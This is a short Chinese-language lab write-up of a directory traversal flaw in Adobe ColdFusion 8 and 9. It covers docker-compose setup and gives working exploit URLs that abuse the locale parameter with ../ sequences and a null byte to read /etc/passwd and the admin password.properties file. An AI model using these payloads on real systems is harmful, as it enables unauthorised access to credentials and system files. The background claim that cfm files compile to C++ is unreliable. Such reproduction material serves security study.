Adobe ColdFusion(直译:冷聚变),是一个商用的快速应用程序开发平台,在1995年由JJ Allaire开创。ColdFusion最初是为了创建能与数据库连接的网站而开发的。2.0版本(1996年推出)以后,它成为了一个全面的开发平台,包括一个集成开发环境以及功能全面的脚本语言。ColdFusion支持的CFML(ColdFusion Markup Language)是一种脚本语言,文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。cfm文件被编译器翻译为对应的C++语言程序,然后运行并向浏览器返回结果。它的设计思想被一些人认为非常先进,被一些语言所借鉴。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
环境搭建
// 执行如下命令启动Adobe CouldFusion 8.0.1版本服务器:docker-compose up -d// 环境拉取完成,直接访问地址http://192.168.233.131:8500/CFIDE/administrator/enter.cfm// 可以看到初始化页面,输入密码admin,开始初始化整个环境。初始化较慢。
漏洞复现
// 直接访问该URL,即可读取文件 /etc/passwdhttp://192.168.233.131:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
// 读取后台管理员密码http://192.168.233.131:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
// 且基本会存在目录遍历http://192.168.233.131:8500/